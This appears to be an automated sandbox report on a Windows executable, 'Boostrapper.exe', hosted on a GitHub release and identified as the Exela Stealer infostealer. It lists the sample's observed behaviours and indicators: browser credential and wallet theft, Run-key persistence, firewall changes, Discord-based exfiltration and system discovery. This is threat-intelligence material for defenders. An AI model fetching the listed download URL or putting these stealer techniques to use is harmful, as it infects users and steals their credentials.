exelastealer | hxxps://github[.]com/Crescentsz/Boostrapper/releases/download/v1/Boostrapper[.]exe

Resubmissions

07-09-2024 15:24

240907-ss4kyssdjg 10

07-09-2024 15:22

240907-sr3bhazerm 8

Analysis

max time kernel
349s
max time network
342s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-09-2024 15:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Crescentsz/Boostrapper/releases/download/v1/Boostrapper.exe

Score

10^/10

exelastealer collection credential_access defense_evasion discovery evasion persistence privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
stealer exelastealer
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1572	netsh.exe
2284	netsh.exe
2300	netsh.exe
1932	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	Boostrapper.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2344	powershell.exe
1932	cmd.exe
996	powershell.exe
2660	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WAVEBOOSTRAPPER.EXE	WAVEBOOSTRAPPER.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WAVEBOOSTRAPPER.EXE	WAVEBOOSTRAPPER.EXE

Executes dropped EXE 9 IoCs

pid	Process
3952	Boostrapper.exe
1540	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
1236	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
936	WAVEBOOSTRAPPER.EXE
1628	WAVEBOOSTRAPPER.EXE
4252	BOOSTEAPPER.EXE
3524	BOOSTEAPPER.EXE

Loads dropped DLL 64 IoCs

pid	Process
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
2168	BOOSTEAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE
3524	WAVEBOOSTRAPPER.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000234f6-465.dat	upx
behavioral1/memory/2168-468-0x00007FFE2A4F0000-0x00007FFE2A955000-memory.dmp	upx
behavioral1/memory/2168-552-0x00007FFE42460000-0x00007FFE42479000-memory.dmp	upx
behavioral1/memory/2168-556-0x00007FFE401B0000-0x00007FFE401CE000-memory.dmp	upx
behavioral1/memory/2168-557-0x00007FFE2B760000-0x00007FFE2B8CD000-memory.dmp	upx
behavioral1/memory/2168-560-0x00007FFE2B5B0000-0x00007FFE2B666000-memory.dmp	upx
behavioral1/memory/2168-563-0x00007FFE40220000-0x00007FFE40244000-memory.dmp	upx
behavioral1/memory/2168-568-0x00007FFE42460000-0x00007FFE42479000-memory.dmp	upx
behavioral1/memory/2168-570-0x00007FFE3CA50000-0x00007FFE3CA72000-memory.dmp	upx
behavioral1/memory/2168-569-0x00007FFE2B240000-0x00007FFE2B358000-memory.dmp	upx
behavioral1/memory/2168-567-0x00007FFE3D090000-0x00007FFE3D0A5000-memory.dmp	upx
behavioral1/memory/2168-566-0x00007FFE3FB90000-0x00007FFE3FBA4000-memory.dmp	upx
behavioral1/memory/2168-565-0x00007FFE425A0000-0x00007FFE425B0000-memory.dmp	upx
behavioral1/memory/2168-564-0x00007FFE40190000-0x00007FFE401A4000-memory.dmp	upx
behavioral1/memory/2168-562-0x00007FFE29970000-0x00007FFE29CE4000-memory.dmp	upx
behavioral1/memory/2168-559-0x00007FFE2A4F0000-0x00007FFE2A955000-memory.dmp	upx
behavioral1/memory/2168-558-0x00007FFE3D0B0000-0x00007FFE3D0DE000-memory.dmp	upx
behavioral1/memory/2168-555-0x00007FFE401D0000-0x00007FFE401FC000-memory.dmp	upx
behavioral1/memory/2168-554-0x00007FFE40200000-0x00007FFE40219000-memory.dmp	upx
behavioral1/memory/2168-553-0x00007FFE43B00000-0x00007FFE43B0D000-memory.dmp	upx
behavioral1/memory/2168-551-0x00007FFE45E90000-0x00007FFE45E9F000-memory.dmp	upx
behavioral1/files/0x00070000000234f0-522.dat	upx
behavioral1/memory/2168-521-0x00007FFE40220000-0x00007FFE40244000-memory.dmp	upx
behavioral1/files/0x000e00000001db64-519.dat	upx
behavioral1/memory/2168-637-0x00007FFE3CA30000-0x00007FFE3CA47000-memory.dmp	upx
behavioral1/memory/2168-639-0x00007FFE3CA10000-0x00007FFE3CA29000-memory.dmp	upx
behavioral1/memory/2168-645-0x00007FFE3D0B0000-0x00007FFE3D0DE000-memory.dmp	upx
behavioral1/memory/2168-644-0x00007FFE3C5A0000-0x00007FFE3C5BE000-memory.dmp	upx
behavioral1/memory/2168-643-0x00007FFE3CA00000-0x00007FFE3CA0A000-memory.dmp	upx
behavioral1/memory/2168-647-0x00007FFE2B5B0000-0x00007FFE2B666000-memory.dmp	upx
behavioral1/memory/2168-657-0x0000020D20110000-0x0000020D208B1000-memory.dmp	upx
behavioral1/memory/2168-642-0x00007FFE3C840000-0x00007FFE3C851000-memory.dmp	upx
behavioral1/memory/2168-641-0x00007FFE3C5C0000-0x00007FFE3C60D000-memory.dmp	upx
behavioral1/memory/2168-640-0x00007FFE2B760000-0x00007FFE2B8CD000-memory.dmp	upx
behavioral1/memory/2168-638-0x00007FFE401B0000-0x00007FFE401CE000-memory.dmp	upx
behavioral1/memory/2168-673-0x0000020D20110000-0x0000020D208B1000-memory.dmp	upx
behavioral1/memory/2168-674-0x00007FFE29970000-0x00007FFE29CE4000-memory.dmp	upx
behavioral1/memory/2168-675-0x00007FFE34C00000-0x00007FFE34C36000-memory.dmp	upx
behavioral1/memory/2168-726-0x00007FFE3CA30000-0x00007FFE3CA47000-memory.dmp	upx
behavioral1/memory/2168-773-0x00007FFE458A0000-0x00007FFE458AD000-memory.dmp	upx
behavioral1/memory/2168-798-0x00007FFE2B760000-0x00007FFE2B8CD000-memory.dmp	upx
behavioral1/memory/2168-814-0x0000020D20110000-0x0000020D208B1000-memory.dmp	upx
behavioral1/memory/2168-810-0x00007FFE3C5C0000-0x00007FFE3C60D000-memory.dmp	upx
behavioral1/memory/2168-809-0x00007FFE3CA10000-0x00007FFE3CA29000-memory.dmp	upx
behavioral1/memory/2168-808-0x00007FFE3CA30000-0x00007FFE3CA47000-memory.dmp	upx
behavioral1/memory/2168-803-0x00007FFE425A0000-0x00007FFE425B0000-memory.dmp	upx
behavioral1/memory/2168-802-0x00007FFE40190000-0x00007FFE401A4000-memory.dmp	upx
behavioral1/memory/2168-797-0x00007FFE401B0000-0x00007FFE401CE000-memory.dmp	upx
behavioral1/memory/2168-791-0x00007FFE40220000-0x00007FFE40244000-memory.dmp	upx
behavioral1/memory/2168-807-0x00007FFE3CA50000-0x00007FFE3CA72000-memory.dmp	upx
behavioral1/memory/2168-790-0x00007FFE2A4F0000-0x00007FFE2A955000-memory.dmp	upx
behavioral1/memory/2168-822-0x00007FFE2A4F0000-0x00007FFE2A955000-memory.dmp	upx
behavioral1/memory/2168-834-0x00007FFE40190000-0x00007FFE401A4000-memory.dmp	upx
behavioral1/memory/2168-850-0x00007FFE2A4F0000-0x00007FFE2A955000-memory.dmp	upx
behavioral1/memory/2168-859-0x00007FFE3D0B0000-0x00007FFE3D0DE000-memory.dmp	upx
behavioral1/memory/2168-908-0x00007FFE43B00000-0x00007FFE43B0D000-memory.dmp	upx
behavioral1/memory/2168-911-0x00007FFE401B0000-0x00007FFE401CE000-memory.dmp	upx
behavioral1/memory/2168-910-0x00007FFE401D0000-0x00007FFE401FC000-memory.dmp	upx
behavioral1/memory/2168-909-0x00007FFE40200000-0x00007FFE40219000-memory.dmp	upx
behavioral1/memory/2168-907-0x00007FFE42460000-0x00007FFE42479000-memory.dmp	upx
behavioral1/memory/2168-906-0x00007FFE45E90000-0x00007FFE45E9F000-memory.dmp	upx
behavioral1/memory/2168-905-0x00007FFE40220000-0x00007FFE40244000-memory.dmp	upx
behavioral1/memory/2168-904-0x00007FFE34C00000-0x00007FFE34C36000-memory.dmp	upx
behavioral1/memory/2168-919-0x00007FFE3D090000-0x00007FFE3D0A5000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Exela Update Service = "C:\\Users\\Admin\\AppData\\Local\\ExelaUpdateService\\Exela.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 59 IoCs

Web Service

T1102

flow	ioc
135	discord.com
147	discord.com
189	discord.com
159	discord.com
195	discord.com
217	discord.com
128	discord.com
192	discord.com
201	discord.com
228	discord.com
145	discord.com
175	discord.com
196	discord.com
161	discord.com
190	discord.com
208	discord.com
194	discord.com
133	discord.com
227	discord.com
169	discord.com
173	discord.com
214	discord.com
132	discord.com
150	discord.com
151	discord.com
211	discord.com
226	discord.com
134	discord.com
203	discord.com
204	discord.com
212	discord.com
216	discord.com
162	discord.com
163	discord.com
205	discord.com
218	discord.com
126	discord.com
130	discord.com
136	discord.com
213	discord.com
229	discord.com
172	discord.com
193	discord.com
207	discord.com
215	discord.com
230	discord.com
143	discord.com
149	discord.com
188	discord.com
160	discord.com
170	discord.com
171	discord.com
176	discord.com
202	discord.com
127	discord.com
144	discord.com
146	discord.com
206	discord.com
174	discord.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
111	api.ipify.org
113	api.ipify.org
152	ip-api.com
184	api.ipify.org
219	ip-api.com

Network Service Discovery 1 TTPs 4 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4104	ARP.EXE
4312	cmd.exe
3056	ARP.EXE
3612	cmd.exe

Enumerates processes with tasklist 1 TTPs 10 IoCs

discovery

Process Discovery

T1057

pid	Process
1184	tasklist.exe
2832	tasklist.exe
1084	tasklist.exe
2680	tasklist.exe
1780	tasklist.exe
3056	tasklist.exe
1936	tasklist.exe
516	tasklist.exe
2452	tasklist.exe
4348	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2452	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4408	sc.exe
3668	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0009000000023478-358.dat	pyinstaller
behavioral1/files/0x000a000000016fd7-364.dat	pyinstaller
behavioral1/files/0x000600000001d8bc-420.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Boostrapper.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4816	netsh.exe
5016	cmd.exe
4540	netsh.exe
644	cmd.exe

System Network Connections Discovery 1 TTPs 2 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
640	NETSTAT.EXE
3216	NETSTAT.EXE

Collects information from the system 1 TTPs 2 IoCs

Uses WMIC.exe to find detailed system information.

Data from Local System

T1005

pid	Process
2696	WMIC.exe
1828	WMIC.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2460	WMIC.exe
1540	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4104	ipconfig.exe
640	NETSTAT.EXE
3712	ipconfig.exe
3216	NETSTAT.EXE

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3792	systeminfo.exe
4140	systeminfo.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
4076	taskkill.exe
5104	taskkill.exe
4064	taskkill.exe
4688	taskkill.exe
684	taskkill.exe
3556	taskkill.exe
2204	taskkill.exe
2368	taskkill.exe
2916	taskkill.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 783546.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4744	msedge.exe
4744	msedge.exe
1516	msedge.exe
1516	msedge.exe
372	identity_helper.exe
372	identity_helper.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
1464	msedge.exe
4532	msedge.exe
4532	msedge.exe
996	powershell.exe
996	powershell.exe
996	powershell.exe
2344	powershell.exe
2344	powershell.exe
2344	powershell.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2204	WMIC.exe
Token: SeSecurityPrivilege	2204	WMIC.exe
Token: SeTakeOwnershipPrivilege	2204	WMIC.exe
Token: SeLoadDriverPrivilege	2204	WMIC.exe
Token: SeSystemProfilePrivilege	2204	WMIC.exe
Token: SeSystemtimePrivilege	2204	WMIC.exe
Token: SeProfSingleProcessPrivilege	2204	WMIC.exe
Token: SeIncBasePriorityPrivilege	2204	WMIC.exe
Token: SeCreatePagefilePrivilege	2204	WMIC.exe
Token: SeBackupPrivilege	2204	WMIC.exe
Token: SeRestorePrivilege	2204	WMIC.exe
Token: SeShutdownPrivilege	2204	WMIC.exe
Token: SeDebugPrivilege	2204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2204	WMIC.exe
Token: SeRemoteShutdownPrivilege	2204	WMIC.exe
Token: SeUndockPrivilege	2204	WMIC.exe
Token: SeManageVolumePrivilege	2204	WMIC.exe
Token: 33	2204	WMIC.exe
Token: 34	2204	WMIC.exe
Token: 35	2204	WMIC.exe
Token: 36	2204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2460	WMIC.exe
Token: SeSecurityPrivilege	2460	WMIC.exe
Token: SeTakeOwnershipPrivilege	2460	WMIC.exe
Token: SeLoadDriverPrivilege	2460	WMIC.exe
Token: SeSystemProfilePrivilege	2460	WMIC.exe
Token: SeSystemtimePrivilege	2460	WMIC.exe
Token: SeProfSingleProcessPrivilege	2460	WMIC.exe
Token: SeIncBasePriorityPrivilege	2460	WMIC.exe
Token: SeCreatePagefilePrivilege	2460	WMIC.exe
Token: SeBackupPrivilege	2460	WMIC.exe
Token: SeRestorePrivilege	2460	WMIC.exe
Token: SeShutdownPrivilege	2460	WMIC.exe
Token: SeDebugPrivilege	2460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2460	WMIC.exe
Token: SeRemoteShutdownPrivilege	2460	WMIC.exe
Token: SeUndockPrivilege	2460	WMIC.exe
Token: SeManageVolumePrivilege	2460	WMIC.exe
Token: 33	2460	WMIC.exe
Token: 34	2460	WMIC.exe
Token: 35	2460	WMIC.exe
Token: 36	2460	WMIC.exe
Token: SeDebugPrivilege	2832	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2460	WMIC.exe
Token: SeSecurityPrivilege	2460	WMIC.exe
Token: SeTakeOwnershipPrivilege	2460	WMIC.exe
Token: SeLoadDriverPrivilege	2460	WMIC.exe
Token: SeSystemProfilePrivilege	2460	WMIC.exe
Token: SeSystemtimePrivilege	2460	WMIC.exe
Token: SeProfSingleProcessPrivilege	2460	WMIC.exe
Token: SeIncBasePriorityPrivilege	2460	WMIC.exe
Token: SeCreatePagefilePrivilege	2460	WMIC.exe
Token: SeBackupPrivilege	2460	WMIC.exe
Token: SeRestorePrivilege	2460	WMIC.exe
Token: SeShutdownPrivilege	2460	WMIC.exe
Token: SeDebugPrivilege	2460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2460	WMIC.exe
Token: SeRemoteShutdownPrivilege	2460	WMIC.exe
Token: SeUndockPrivilege	2460	WMIC.exe
Token: SeManageVolumePrivilege	2460	WMIC.exe
Token: 33	2460	WMIC.exe
Token: 34	2460	WMIC.exe
Token: 35	2460	WMIC.exe
Token: 36	2460	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe
4744	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4744 wrote to memory of 4252	4744	msedge.exe	84
PID 4744 wrote to memory of 4252	4744	msedge.exe	84
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 2728	4744	msedge.exe	85
PID 4744 wrote to memory of 1516	4744	msedge.exe	86
PID 4744 wrote to memory of 1516	4744	msedge.exe	86
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87
PID 4744 wrote to memory of 3192	4744	msedge.exe	87

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1088	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Crescentsz/Boostrapper/releases/download/v1/Boostrapper.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
